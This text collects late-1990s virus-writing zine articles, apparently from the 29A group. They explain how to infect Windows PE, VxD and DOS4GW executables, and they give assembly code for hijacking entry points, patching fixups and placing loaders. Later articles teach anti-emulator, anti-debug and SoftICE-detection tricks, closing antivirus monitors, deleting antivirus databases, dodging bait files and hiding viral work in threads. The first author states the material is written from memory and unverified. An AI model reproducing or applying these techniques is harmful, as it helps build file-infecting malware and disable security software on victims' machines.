1. Where to store the virus body Before we will go any further, we should notice, that none of us known implementation of Window$ that checks if we execute the code in sections which is declared as data (cool enough ... :-P). This is the fact all the viruses (and packers as well) heavy relies on. As for the storage of the body, i saw till now 3 different strategies. Common strategy is based on the extending the last section. In such a case is "conditio sinne qua non" basic condition the section should be writeable in the section attributes (Intel platform could check it). As for the implementation of this method, it easy as it could only be, but for resident viruses we can got in to the trouble.... Physical data in the section can be followed by uninitialized data, which can be changed by the program. This means our fine piece of code may become fucked up. Therefore whole viral body should be moved elsewhere. Another method is to create new section in the file and copy virus body there. This approach has one major disadvantage (which is nearly impossible to solve) - nonstandard section name could arise a suspiction of something not very pleasant going on, not speaking of the situation header is to small for adding another section. Contrary, advantage is we have our section just for us, nobody can overwrite the virus. As for the implementation, trivial again in comparision with before mentioned method we have one aditional task - we need to know, where last section ends. One of the non-standart method is the one used by CIH virus. This is all about the using the free space in
sectors which are aligned to FileAlignment value (0x200 by default). This technique is very clever (invented by some as Germans use to say "Klugscheisser") as we get bonus in some cases there is no increase in file lenght plus the virus is harder to clean. This method will not be in the focus of this article as for the larges viruses in not suitable. Main disadvantage of the first two methods is the code runs in the last section. And if some emulator get here, there are just and only 3 options left. 1. virus 2. packer 3. some anti-whatever envelope But solution is up to you - probably best way would be to use CIH approach and place entry point in the first sections.
2. we_need_to_be_first_on_the_draw how to make our fine virus the supreme commander in the system Most trivial solution is to modify AdressOfEntryPoint in the PE header to point to start of added (viral) code. In plain words put there RVA of virus entry point. Nothing more nothing less. More rafined methods are e.g. to hook some import (let's say CreateFileA or whatevever is on 100% callled in every proggy) or even hook export in DLL's so every call to DLL goes through virus. This approach is not trivial as complicated search in structures is required. Some of the options will be covered in next section.
3. How to call API functions This is the key problem of all the viruses. This problem could be transformed in the question - what API calls i need to get pointer to whatever API function? Answer is GetModuleHandle and GetProcAdress. If we have pointers to this functions we can get pointer to any function we want. Both of this two API calls are exported from kernel32.dll. As i haven't seen any application not importing something from this important system module we can perform test if the file we want to infect imports from kernel32.dll. Then we have to search in import table and look for this two functions. If we find them, the file is suitable target for the infection. Imports in PE file work that way they point to some dword and in this dword will be set address of imported function. All the requests in the file for specific API function will look like call dword ptr [dddd]
Advantage for us is there is no problem to hook function and at each call to this function do "something". To the import table we will get throug DataDirectory (i think index 1). This should point to the array of structures IMAGE_IMPORT_DESCRIPTOR. Last element of the array should have Characteristics set to 0. Name is RVA pointer to the name of the module from which the import is performed. OriginalFirstThunk points to array of type IMAGE_THUNK_DATA from which we can get the name of the function. Let's saz the function has index i. Then pointer to function f in imports will be i-th element of the dword array, to which
FirstThunk points. Last element of the array of type IMAGE_THUNK_DATA is zero. I recommend to see it all in HIEW and then in debugger search where the desired functions are. // // Import Format // typedef struct _IMAGE_IMPORT_BY_NAME { WORD Hint; BYTE Name[1]; } IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME; typedef struct _IMAGE_THUNK_DATA { union { PBYTE ForwarderString; PDWORD Function; DWORD Ordinal; PIMAGE_IMPORT_BY_NAME AddressOfData; } u1; } IMAGE_THUNK_DATA; typedef IMAGE_THUNK_DATA * PIMAGE_THUNK_DATA; #define IMAGE_ORDINAL_FLAG 0x80000000 #define IMAGE_SNAP_BY_ORDINAL(Ordinal) ((Ordinal & IMAGE_ORDINAL_FLAG) != 0) #define IMAGE_ORDINAL(Ordinal) (Ordinal & 0xffff) typedef struct _IMAGE_IMPORT_DESCRIPTOR { union { DWORD Characteristics; // 0 for terminating null import descriptor PIMAGE_THUNK_DATA OriginalFirstThunk; // RVA to original unbound IAT }; DWORD TimeDateStamp; // 0 if not bound, // -1 if bound, and real date\time stamp // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND) // O.W. date/time stamp of DLL bound to (Old BIND) DWORD ForwarderChain; // -1 if no forwarders DWORD Name; PIMAGE_THUNK_DATA FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) } IMAGE_IMPORT_DESCRIPTOR; typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;
As I mentioned before, there is no need to do all fixups while file is being infected. It is either possible to do it after file is loaded. Just find old 'MZ' header and trace file structure. (What is nice, rva are almost valid pointers so you need just to add base address and you can follow any structure). After you find first export to Kernel32 use the same method to find start of kernel32 and then follow export table ... As for the exports it's much easier, but i had no time for experiments and will let this problem open. If you want know more, look for it in some PE doxes (RTFM).
I would like to point to the fact the article has been written more or less using just and only my memory (my degenerated gray cell mass), has not been subject to verification and thus i can't guarantee any fact presented here is true :)))))) If you are interested in the problem, you should see it again elsewhere, in some more reliable refference. And finally, some warm closing words. If the fucking proggy doesn't work and you poor guy did check it all over and over about 10 times, try to find that bug in the Windows loader. Navrhar
In this article I will announce my aproach to infection of strange platforms as are Windows VxD or dos DOS4GW. Both platforms are running under similar environment - in FLAT memory model both are extended 32-bit so this is the reason why I have dealed with both of them.
So let's start In both cases we will infect host with small loader, that will load and execute main part of virii. This strategy is nice because there is no code executed in last section and so on. LE (as I will call LX too, because there are similar or even the same), is intel friendly, because it uses 4096 bytes long pages. Each section is aligned to page. This means, that in average case 2000 bytes in code section is unused and free. Nice, isn't it :-). This wasting of space we will use to insert our short "loader" that will load other stuff from end of file (if you want, it may be placed elsewhere, or you may groove last section i have a feeling that there may be debug info or other shit, so not so fast) and execute it. Because of flat model and you never knows where will you be loaded, this piece of code must be self-relocating. Enough of talking, go on. VxD starts as regular dos-executable with pointer to next header at 3Ch (just like in PE). With DOS4GW it is a bit difficult. DOS4GW starts with some stupid stub, that will load main LE/LX executable. I don't deal with this too much, I just looked at some Dos4GW and wrote this part of code readfile is macro as follows: readfile ofs, size, buf reads at offset ofs+file_base+objectr size bytes to buffer buf ; check if WATCOM ? loader mov file_base, 0 mov objectr, 0 cmp jne
; base of start of LX (to skip stubs)
byte ptr infmode, INF_DOS4 short continue_vxd
readfile 0h 16 le_header cmp word ptr le_header, 'ZM' je short ok001 cmp word ptr le_header, 'MZ' jne novalidvxd
; check exe signature
ok001: movzx dec shl movzx add
esi, esi esi, ebx, esi,
word ptr [le_header+4] 9 word ptr [le_header+2] ebx
readfile esi 24h le_header cmp word ptr [le_header], 5742h ; some kind of executable? jne short continue_vxd add esi, dword ptr [le_header+20h] mov file_base, esi continue_vxd:
now file_base should point to regular DOS 'MZ' exacutable with dword at 3ch set as it should have. So just get start of LE header like this and check some formalities: readfile 3ch 4 le_seek
; read le header readfile le_seek 100h le_header ; check 4 signature cmp word ptr le_header, 'EL' jne nole ; check if pages are 4096 bytes long cmp dword ptr le_header+28h, 1000h jne nole ; ...
Now we have to understand some LE specific stuff. At first LE is fragmented to sections (similary like PE). Sections are called Objects here. Objects are in header and there is usually not enough space to create your own object. This code will compute offset of eax-th section descriptor: ; compute object descriptor offset in file (relative to file_base) ; eax - object num getobjptr: shl eax, 3 lea eax, [eax+2*eax-24] ; first object is num 1 add eax, dword ptr le_header+40h add eax, leseek ret
Object descriptor structure is as follows: object_desc label byte ; object info record virtsize dd 0 ; object virtual size virtbase dd 0 ; object virtual base flags dd 0 ; flags pageindex dd 0 ; page index ... pageen3z dd 0 ; num of page entriez dd 0 ; alignment? object_desc_len = $-object_desc
This offset of object in file should be computed as objectr = *(dword *)[le_header+80h] + pageindex<<12
Object in file is (of course) not fragmented. It starts at objectr and ends at (objectr+pageen3z<<12-1) The second new entity in LE are entries. This is some kind of exports in PE. This is how to assume offset of eax-th entry: (objectr will point to start of entry). ; this will assume entry eax (read and write will be relative to this) ; assume entry eax - entry num le_assume_entry: ; relative to header mov edx, leseek mov objectr, edx ; get add lea add
entry offset in file eax, eax eax, [eax+4*eax+1] ; * 10 + 1 eax, dword ptr le_header[5ch]
; read entry descriptor mov ecx, 10 lea edx, buffer call rdfile ; get object num movzx eax, word ptr buffer+1 ; assume this object call le_assume_object ; add relative entry offset mov eax, dword ptr buffer+4 add objectr, eax mov objoffset, eax ret
And the last thing you need to know about are relocations. Because code may be stored anywhere between 0-4GB, each access to memory has to be relocated. (The only one exceptions are jumps which are relative to itself). Because of this LE has very complex structure of relocation (much more complicated than PE). Because of complex structure of relocations, many compilers are seting values to be relocated to 0. If you really want to deal with this i will advise you to some documentation. But if you don't this is a fragment of code that scans for relocation: This is code i wrote to parse relocation table and to find some relocation that relocates eax: I wrote it so far ago so i will be not trying to explan this - just see documentation (as far as i know there is no good documentation :-( ). ; ; ; ;
finds fixup for eax in fixup table that relocates eax sets fixupptr = ptr to entry in fixup table (relative to filestart) parses whole fixup table in order to find an entry and create relo map eax = pointer to find
find_fixup: mov xor mov mov mov
edi, eax eax, eax fixupptr, eax fix32, al fix_important, al
; allocate table for relos mov eax, RELO_TABLE_SIZE/8 mod_call md_alloc mov relo_map_ptr, eax ; make whole area unusable push edi mov edi, eax xor dec mov rep
eax, eax eax ecx, RELO_TABLE_SIZE/8/4 stosd
pop
edi
; walk across all objects and process some of them xor inc @@loop_section: push
eax, eax eax eax
; eax = object ptr call le_assume_object mov mov
eax, leseek objectr, eax
test jnz
flags, 10100000b @@skip_this_object
mov mov
eax, objpage temp_base, eax
; get size of object mov ecx, pageen3z push ecx shl ecx, 12 call zero_out_block pop mov
ecx eax, pageindex
; base to LE filestart
; walk through page map and fixup entries @@process_page: push
eax ecx
; load item ; 4 bytes long entry dec eax shl eax, 2 add eax, dword ptr [LE_header +48h] mov lea call
ecx, size page_map_table_entry edx, page_desc rdfile
; doesn't work on VxD LE files ; cmp page_desc.page_type, 0 ; je @@hardcopy_no_work movzx xchg
eax, page_desc.fixup_index al, ah
; now get ptr to relocation by index push eax dec eax shl eax, 2 add eax, dword ptr [LE_header+68h] lea xor mov call
edx, fixup_cur ecx, ecx cl, 8 rdfile ; in this table is one entry with no meaning, just ; identifying end
pop
eax
mov mov sub
ecx, fixuptrnext eax, fixup_cur ecx, eax
add
eax, dword ptr [LE_header+6ch]
; eax points to fixup table ; process ecx bytes from fixup record add ecx, eax sub
edi, temp_base
@@loop_this_page: cmp eax, ecx jae @@just_done @@cont_relo: push
eax ecx
; load relocation in buffer lea edx, buffer mov ecx, 20h call rdfile ; process relocation lea esi, buffer xor eax, eax ; get first byte lodsw mov ecx, eax ; test if single test cl, 20h jnz @@multiple1 lodsw call
set_eax
cmp sete
eax, edi fix_important
jmp
@@not_multi
@@multiple1: lodsb mov
; count dl, al
@@not_multi: ; check mov and cmp je cmp je ; ;
for unknown relocation eax, ecx ax, 0001100001111b ax, 7h @@type_78 ax, 8h @@type_78
marker 'unknown relocation' raise_x INF_FILE_FATAL
@@type_78: ; assume object is 8 bit lodsb ; if important object store ptr and size cmp fix_important, 1 jne @@no_important mov sub mov add mov add xor
fixupptr, esi fixupptr, offset cs:buffer eax, dword ptr [esp+4] fixupptr, eax eax, objectr fixupptr, eax eax, eax
test setnz
ch, 10h fix32
@@no_important: lodsw test ch, 10h ; check if 32-bit jz @@fixed lodsw @@fixed:
;
test jz
cl, 20h @@nomultiple2
mov test jz
@@prefix, 66h cl, 10h @@no_prefix_chg
marker '32-bit repeated relo' mov @@prefix, 90h
@@no_prefix_chg: movzx ecx, dl @@enz: @@prefix db 66h, 0adh call
set_eax
loop
@@enz
; lodsw
@@nomultiple2: pop
ecx eax
sub add
esi, offset cs:buffer eax, esi
jmp @@just_done: add ; done
@@loop_this_page edi, temp_base
@@hardcopy_no_work: pop ecx eax inc
eax
add
temp_base, 1000h
dec jnz
ecx @@process_page
@@skip_this_object: pop inc cmp jbe
eax eax eax, dword ptr [le_header+44h] @@loop_section
; cnt of objects
ret set_eax:
@@err:
push add shr
eax ebx eax, temp_base eax, RELO_TABLE_BLOCK_SIZE
cmp ja
eax, RELO_TABLE_UPPER_LIMIT @@err
mov
ebx, relo_map_ptr
btr
dword ptr [ebx], eax
pop ebx eax ret ;marker 'RELO_TABLE_EXCEED' pop ebx eax ret
zero_out_block: push eax ebx ecx mov
ebx, relo_map_ptr
shr
eax, RELO_TABLE_BLOCK_SIZE
@@zero_out_next: btr dword ptr [ebx], eax inc eax cmp eax, RELO_TABLE_UPPER_LIMIT jae @@cln_exceed sub ecx, (1 shl RELO_TABLE_BLOCK_SIZE) jb @@zero_out_next @@cln_exceed: pop ecx ebx eax ret
This is way i proceed VxDs: 1. some check mov or jne
eax, dword ptr le_header+18h ; entry object eax, dword ptr le_header+1ch ; entry offset novxd ; seems to be a real executable ! ; UPDATE
2. check if there is enough space in code section. i assume code section is section 1 (first section). 3. assume DDB entry - this is entry that describes VxD in Windows this contains pointer to control dispatcher. This is a functions that handles various events, and this is how we get to turn. Pointer to dispatcher is first 4-bytes of DDB 4. find fixup for dispatcher
5. write your code to end of code section, groove this section and change fixup to start of your code. be sure that after end of your loader you return control to previous dispatcher. Note: the value of relocation is more trustable than value in DDB
And what your dispatcher should do: 1. test for special event (number in eax). I used 2 (Init_Complete) that is sent to all VxDs after init of windows is complete. 2. check wether there is anybody resident (because you are at VxD level, you have full control of computer, you don't need to have multiple instances) 3. load your dropper from end of file (file name will be stored by infection - vxd should not be moved) 4. run your code
Some hints on ring 0 Of course after your code is running in the memory you may do anything what may a regular VxD do. There are no restrictions. At first because interface for VxD calls. Every VxD call looks like this: db 0cdh, 20h, xx, xx, xx, xx
where xx xx xx xx is number of service. It means there are no imports and exports needed. After this code is executed it is patched to call dword ptr [addr]
where addr is pointer to some internal table where is stored pointer to function. You must agree this was designed for viruses to get control over service. This may be useful, when you want to check wether you are resident or not. About hooking filesystem just see IFS_Mgr_InstallFileSystemApiHook And for last dont forget in_resident flag and mutexes or other synchronizing stuff. That's all about this .... happy coding
And now some few words about DOS4GW LE: In DOS4GW you may relay to DPMI (that should be supportet quite good) under any platform it works. 1. get entry point at le_header+1ch is offset (relative to start of section and at le_header+18h is object no 2. groove object (if enough space) and store loader at end of section 3. set new entry offset You don't need to deal with fixupps and other shit. Your loader will do this: 1. start with short jump followed by "WATCOM" if this is not loader will say something like "Invalid executable" and this is way how to test wether executable is compiled by WATCOM too 2. load code from end of file and run it (environment segment is at ES:2C like usually, you may use dos
services (int 21h) and DPMI (int 31h) - that is all you need) As you see DOS4GW is pretty easy target ...
What to say at the end? ... do your best!
Disclamer The followin' document is an education purpose only. Author isn't responsible for any misuse of the things written in this document.
Foreword Every good virus should be armoured. Armoured means have some features, by which will be harder to detect, harder to emulate, harder to disassemble, harder to trace, harder to monitor or harder to understand. I will discuss here all techniques, which has some special meaning in virus programming.
Introduction Actually, there r many ways, how to protect virus against AVs and Averz under so weird interface as Win32 is. Something is often used, something isn't. Here is a "short" list of techniques, which I will describe: anti-emulator anti-heuristics anti-analysis (anti-disasm) anti-debug anti-monitor anti-antivirus (retro) anti-bait
Anti-Emulator - fool AVs by some tricks By heuristic analysis, AVs SHOULD be find every virus, even unknown one. It worx like coder, which debugging some program. Heuristic scanner passes thru the code and looking for some suspicious code. It may be procedure for searching APIs, procedure to jump to ring-0, working with wildcards of executable files, opening executable file for write etc... Heuristic analysis is very good idea, nevertheless, not very well realised. AVs have many bugs and "sometimes", they can't recognize viral code. Some heuristic scanners have problems with undocumented opcodes, another scanners can't work with selectors and almost every scanner can't handle stack properly. Here r the techniques, which r used by many viruses and which still seems to be problem for heuristic scanners: Use selectors and stack mov eax, ds push eax pop ds mov ebx, ds cmp eax, ebx jne emul_present
or
;load DS ;some ;stuff ;load DS again ;compare selectors ;if not same, quit
mov edx, esp push cs pop eax cmp esp, edx jne emul_present
;load ESP ;some ;stuff ;compare stack pointer ;quit if not equal
Use RETF instruction push cs push offset label retf
;store CS ;store address of procedure ;and go there
Use undocumented opcodes db db
0D6h 0F1h
;SALC ;BPICE
And more...
Anti-Heuristics - fool AVs by advanced technologies Anti-Emulator uses holes in heuristic scanners. But at Anti-Heuristic case, we uses more advanced technology to fool AVs. If AVerz were able to "patch" holes in AVs, here it won't be so easy. They will need to rebuild their emulator and add new features (e.g. support of SEH). In DOS-viruses beginnings, viruses tried to hook Int 0 (divide by zero) and then divided register by zero. This caused, that execution was redirected to another place. AVerz had to rebuild their heuristic analysis to support hooking of interrupt vectors. This is perfect example of anti-heuristic technology. Next good example is poly-layered polymorphic decryptor. Time didn't chang so much and we use similar techniques to cause AVs to support newer and newer techs. Here r some examples: Use Structured Exception Handling @SEH_SetupFrame <seh_proc> xchg [edx], eax ... seh_proc: @SEH_RemoveFrame ...
;setup SEH handler to seh_proc ;cause GP fault ;garbage code ;remove SEH handler ;code continue here
Use threads and fibers Use pentium+, copro, MMX, 3DNow! opcodes Implement metamorphism to your virus Implement mid-infection and EPO (EntryPoint Obscuring) techniques Redirect code to another place by callbacks And so on... Some coderz call this technique as anti-emulator and previous as anti-heuristic. I don't know, which expresion is right (nobody knows :D) and I don't care. I think, that previous stuff was clear...
Anti-Analysis - fool disassemblers by some tricks Good virus should use some tricks, by which some curious ppl (such as AVers) won't be able to analyse it much easy. Really, there ain't anything easier for AVer than open IDA or Sourcer and see whole code as it was original source. Static analysis is very frequently used to analyse virus, don't forget it. Those tricks r still same and some of them r also used as Anti-Debugging technique.
Encrypt/cipher your virus as much as possible Don't code generic delta offset stuff, rather use: call label gdelta: db 0b8h label: pop ebp ... mov eax, [ebp + variable - gdelta]
;MOV opcode ;get delta offset ;next code ;example of handling EBP
Use jump into instructions opcd:
jmp opcd+1 mov eax, 0fcebfa90h
;jump into instruction ;NOP, CLI, infinite loop
Use prefixes (similar as in delta_offset example) proc1: proc2:
movzx ecx, word ptr [edi+4] ret db 0b8h mov eax, [edi+3ch] ret
;some code ;quit from procedure ;prefix (MOV EAX, ...) ;some code ;quit from procedure
Patch dynamic code at run-time (this can be also called as anti-heuristic if u will patch code in some hidden procedure, such as in thread etc...) patch: label:
call label ... jmp shit ... mov [patch], 90909090h ret
;some garbage code ;... ;normal code ;overwrite garbage with NOPs ;and quit from procedure
Anti-Debug - harder to analyse In previous examples we tried to fool machines - emulators and disassemblers. But now, we will try to fool AVerz, and that's very hard. AVerz aren't dumb (mmm, ofcoz there r some exceptions :D), so it is very important to make analysis of your virus harder. As much as possible. If virus cannot be analysed by disassembler, AVerz uses debuggers. Debuggers r easily detectable (Win32 interface allows it to us), but their detection mechanism shouldn't be very visible (AVerz can simply jump over the code). Use Win98/NT API to detect API level debugger - IsDebuggerPresent call IsDebuggerPresent xchg eax, ecx jecxz debugger_not_present
;call API ;result to ECX ;if ZERO, debugger not present
Check context of debugger mov ecx, fs:[20h] jecxz debugger_not_present
;load context of debugger ;if ZERO, debugger not present
Use Structured Exception Handling (see Anti-Heuristics) Use VxD service (Ring-0 only) to detect drivers in memory - Get_DDB mov eax, 202h VxDCall Get_DDB xchg eax, ecx jecxz sice_not_present
;SoftICE ID number ;call service ;result to ECX ;SoftICE not present
Use Win32 compatible way to detect drivers in memory - CreateFileA xor eax, eax push eax push 4000000h push eax push eax
;EAX=0 ;parameters ;for ;CreateFileA ;API
sice ;sice
push eax push eax push offset sice call CreateFileA inc eax je sice_not_present dec eax push eax call CloseHandle ... db '\\.\SICE',0 db '\\.\NTICE',0
;function ;... ;name of driver ;open driver ;is EAX==0? ;yeah, SoftICE is not present ;no, ;close its handle ;... ;and make some action ;SICE driver under Win9X ;SICE driver under WinNT
Play with debug registers (Ring-0 only) mov eax, '****' mov dr0, eax
;set already_infected mark ;to dr0
Calculate CRC32 and check it at virus start. It prevents from inserting breakpoints to code. Play with paging and SMM mode (see XiNE#4)
Anti-Monitor - killing watch-dogs Resident shields (monitors) r resident programs used to catch viruses. Monitors r activated, when executable files (usually) r opened, closed, executed, etc... Virus can be cought by monitor not only when infected file is being executing, but also when file is being copying. This on-line virus security is very efficent and many stupid users have installed some monitor. That's a problem. If monitor is installed as standard Win32 application in memory, it won't be big problem to get rid of that. Bad stuff is that this code doesn't work on AVs, which use special driver (VxD, WDM, ...) to control file access. Firstly we have to find window, which will we close. We will use FindWindowA API: wAVP
db 'AVP Monitor',0 ... mov eax, offset wAVP push eax cdq push edx call FindWindowA xchg eax, ecx jecxz quit
;window title ;window title ;push parameter ;EDX=0 ;window class - NULL ;find window ;swap EAX with ECX ;if ECX=0, quit
If AVP monitor window exists, we have window handle in EAX register. Otherwise, EAX is NULL. We will use that handle to send close message: push push push push call
edx edx 12h ecx PostMessageA
;NULL parameter ;NULL parameter ;WM_QUIT message ;window handle ;send message!
Geee, and AVP monitor is away! I also tested it with NODICE and it also worked. U can close another monitors, if u know titles of their windows.
Anti-Antivirus - destroy your enemy! If u wanna be sure, that stupid user won't find your virus, then correct that "problem" on AV side - erase or modify AV crc files and AV databases. Here r the most important files, which should be erased (mm, but don't forget that after u delete viral database, AV won't run) or in better case - only modified (e.g. delete virus from database):
*.AVC AVP.CRC *.VDB NOD32.000 ANTI-VIR.DAT CHKLIST.MS
- AVP viral database - AVP crc file - DrWeb viral database - NODICE viral database - TBAV crc file - MSAV crc file
+ some other old AV crc files
Anti-Bait - don't infect AV files Baits r mostly silly do-nothing programs and the only one purpose of their existency is to be infected by virus. That program can be easily analysed, easier than winword.exe, for example. And becoz we wanna make job to AVs as hard as possible, we r tryin' to not infect those shitty programs. Baits r usualy named as 00000000.EXE, 00000001.EXE, 00000002.EXE, etc. The first advice is don't infect files with digits in its name. But take care! Many normal programs has digits in its name, such as winrar95.exe or wincmd32.exe. So, if u don't wanna infect baits, but wanna infect standard applications, check, if filename contains digits at all 4, 6 or 8 positions. How easy...X-D
Closin' I hope this article will help u with coding under Win32 and u will find it useful. If u didn't understand everything, then read it again or cotact your netwerk supervisor :)). Don't forget to use some techniques from this article to be sure your virus will be better than average. Benny / 29A, 1999
Disclamer The followin' document is an education purpose only. Author isn't responsible for any misuse of the things written in this document.
Foreword Threads r relatively new, but very useful and very perspective feature/tech used by some new Win9X/NT viruses. This article describes everything important about threads. Becoz I wrote many multithreaded viruses and actually I'm coding new one, I decided to write this. Everything, what is described here I researched - so, be tolerant to this - this article ain't for lamerz and I expect, u will research a bit on it and won't only rewriting existing code. This is my third article about threads. If u would like to read my first articles, then u have to wait for 29A#4 releasion (there r explained more details with more examples). Be patient and promise me u will read it :)
Introduction - why threads? In my opinion, to know threads is must. If someone doesn't know threads, then he doesn't know Win32. That's a shame - many VXerz which code for Win32 doesn't know threads, albeit it has many advantages. I think it is same "kewl and useful technology" as was polymorphism. Well, here comes the main question - what is thread? It is hard to explain to someone, who doesn't know what processes. Ok, then, what is process?
Processes - definition Process is defined as one instance of running program. Example: u have one program - calculator. If u will have three calculators running, u still have one program, but also three executed processes. Oppositely to Win16 interface, process in Win32 is nonactive. Process can only own something - 4GB private address space, code, data, handles, allocated memory, kernel objects and such like. Everything allocated by process or system is automatically dealocated after process will quit. Process can't execute code.
Threads - definition Thread is kernel object and is owned by process. Thread is executing code. Where in Win16 operating system was swiching (commiting processor time) between tasks (processes), in Win32 is operating system switching between threads. Process can create so many threads as it want (blah, it's limited by memory and DWORD capacity :D). Imagine this situation: u have executed one instance of Calculator and WinWord. Calculator has only one thread and WinWord has five threads. In that case, operating system will commit processor time "parallely" to six threads (depending on set priorities) - Win16 could switch only between processes and there were no threads. Threads r very often used in Win32. For example, if u wanna print something from some editor, then editor will create new thread which will service printing and u will still be able to edit text - one thread for editting, second thread for printing. Big advantage is that all threads r scheduled by operating system. All u need is to synchronize them - and thats the most difficult. When new process is created, the system will by default create first thread, also called "primary thread". Remember it!
Using threads under Win32 environment Here I will talk about Win32 compatible way of using threads.
1. Theory Coding threads for Win32 seems easy. In fact, it's easy, but u must know some system structures and characteristics. If u will create threads by following API, your code should work on all Win32 platformz. Before we will talk about creating threads, u should know some important things. Thread owns its: context structure stack Context structure contains all registers. Everytime, when system switch to another thread, it will restore all registers from that strucure. Context structure is the only one processor-dependent structure in all Win32. Every thread has also its own stack allocated in 4GB address space. Standard size of stack is 1MB. Process can be created by CreateThread API function: Syntax: HANDLE CreateThread (LPSECURITY_ATTRIBUTES lpsa, DWORD cbStack, LPTHREAD_START_ROUTINE lpStartAddr, LPVOID lpvTParam, DWORD fdwCreate, LPDWORD lpThreadID); Parameters: a) lpsa: Pointer to SECURITY_ATTRIBUTES structure. For default security attributes use NULL value. b) cbStack: Size of stack. Use NULL for default stack = 1MB. c) lpStartAddr: Address of thread function. d) lpvTParam: 32bit parameter which will be passed to thread. e) fdwCreate: If u want to create thread, but suspend commiting cpu time, then push CREATE_SUSPENDED. That thread will stay suspended until u call ResumeThread API. f) lpThreadID: Must be valid address to DWORD variable. ID of created thread will be stored there. This API will create new Win32 compatible thread. As output u will get actual process related handle and whole-system related ID number. Thread handle as any other handles is valid only for one actual process, ID number is valid in all system until thread will be closed. Thread can be terminated by ExitThread or TerminateThread APIs: Syntax: void ExitThread (UINT fuExitCode); This API will terminate actual thread and set exit code to fuExitCode. Syntax:
BOOL TerminateThread (HANDLE hThread, UINT fuExitCode); This API can terminate thread handled by hThread handle. Oppositely to previous API, this API can terminate any thread, not only actual one. But be carefull! If u terminate thread which is writing to disk, it can cause damages to system! There r many other APIs for work with threads, but this article ain't so much practical as theoretical. If u r really interested in thread and if u wanna know more about it, download Win32 SDK or contact me.
2. Synchronization As I said some minutes before, thread synchronization is something really difficult, if not the most difficult thing. It is REALLY important to take a special care on it. Becoz threads can run separatelly and independently from other threads and u want to control all threads u created, u have to SYNCHRONIZE them. Remember this: do not synchronize threads by single variables, rather use kernel synchronization objects! principle of synchronization: sleep the thread until the thread or another kernel object will be signalised, which in the simple words means: until thread will be terminated (it ain't so simple as I said, but in this sample its enough for u). when thread is in sleep state, CPU won't commit CPU time to thread and so it won't slow the computer. when thread is not in sleep state, CPU will commit CPU time. Thread can suspend itself from commiting CPU time until kernel object will be signalised (in our case terminated). For that purpose there is one API in Win32 interface called WaitForSingleObject: Syntax: DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); Parameters: a) hHandle: H andle to kernel object. b) dwMilliseconds: Number of milliseconds to wait. If u want to wait until object will be signalised for unlimited time, pass -1 to this API. Return values: -1 The function failed, u can get extended error code by calling GetLastError API. 0 If object has been signalised. 80h Thread waited for signalisation of object and object was signalised coz object has been abandoned. 102h Object hasn't been signalised in time spec. by dwMilliseconds parameter.
3. Practice Ok, I hope u understood everything and if not, u will do so after some examples. The easiest, but the least efficent idea is: 1. Create new thread and make all viral actions inside it (see CreateThread API) 2. Sleep primary thread until primary thread will be finished (see WaitForSingleObject API) Example: ... push offset threadID push 0
;some action before ;where will be stored thread ID ;normal thread initialization
push push push push call
12345678h offset threadProc 0 0 CreateThread
;parameter for thread *) ;address of thread function ;normal stack - 1MB by default ;default security attributes ;create thread!
push eax
;parameter for CloseHandle **)
push -1 push eax call WaitForSingleObject
;wait until thread will be terminated ;handle of thread ;wait!
call CloseHandle
;close thread handle **)
...
;some action after this
threadID
dd
?
...
;variable needed by CreateThread API ;some code
threadProc: pushad mov eax, [esp+24h] ... popad ret
;new thread starts here ;store all registers ;get parameter passed to our thread *) ;some code ;restore all registers ;quit via undocumented way, no need to ;import ExitThread API
By this we will create new thread, wait for its termination and close its handle. Thread will store all registers, get parameter to EAX register, restore all registers (needed by RET) and terminate thread (and code above will be able to continue). Another idea, more efficent is: 1. Create new thread, wait some seconds and make all viral action inside it 2. Jump to host without waiting for thread termination Example: ... push push push push push push call
offset threadID 0 0 offset threadProc 0 0 CreateThread
push eax call CloseHandle
;some action before ;where will be stored thread ID ;normal thread initialization ;parameter for thread ;address of thread function ;normal stack - 1MB by default ;default security attributes ;create thread! ;handle of thread ;close thread handle
jmp dword ptr [origEntryPoint];jump to original EntryPoint threadProc: pushad
;thread starts here ;store all registers
push 10000 call Sleep
;10 000 milliseconds = 10 seconds ;wait 10 seconds
...
;some viral actions
popad ret
;restore all registers ;and quit
origEntryPoint dd
402000h
;saved original entrypoint
By this we will create new thread, close its handle and jump to host program. Thread will on the background suspend itself for 10 seconds (suspend thread from CPU time commiting), make some viral actions and terminate itself. We suspended our thread, becoz it will be less suspicious to user (virus won't slow down the system immediatelly).
All these algorithms r very simple and gives the AVs chance to trace them (everytime only one virus thread runs). It also ain't very good to create many threads where still only one will be alive (such as in my Win32.Leviathan). Much better idea is to run two or more threads "in the same" time, where one thread cannot run without second one (and that second one cannot run without third one and so on...). It makes the analysis much harder, if not impossible. The main idea is: let all threads be running and let operating system synchronize them (do not synchronize them manually, becoz AV will be able to emulate it - they aren't able to do that now, but I think they will do so after some months). Here is an algorithm: 1. Create two threads, primary thread will pass execution to host program 2. Let first thread make 50% of some action and second thread to make next 50% of action without synchronization 3. After everything is complete (when first thread will terminate itself, it will set flag. After two flags will be set ...), then create another two threads, where another halfs of actions will be done and terminate previous two threads. 4. Recursively do all of this until all viral actions will be done. This won't be so easy to trace (also not for u :D)... this is my idea of future working of viruses. I never coded virus using this algorithm, but I will do that. Now, it's only an idea...
Using Ring-X threads under Ring-0 Now u should know all important things about threads. All previous examples can work under all Win32 platformz - it's the most compatible way. I also wrote article about Ring-0 and Ring-3 threads under Ring-0, which will be published in 29A#4. From that time I didn't find anything new, so I haven't anything new to show ya here. I think it wouldn't be good to copy whole article here, becoz that article would be shit then. Please, wait for 29A#4 releasion and u will find there also that article. Thank you. Advantages of threads created from Ring-0: 1. 2. 3. 4.
Anti-Debug Anti-Heuristic Residency And much more...
Closin' I hope, that u enjoyed threads and that u will implement them in your next virus. If u didn't understand anything, then contact me at
[email protected] and I will help ya. Last greetingz goes to *-zine stuff, especially to Flush, Mgl and Navrhar for letting me publish this article. Good luck in coding guys! Benny / 29A, 1999
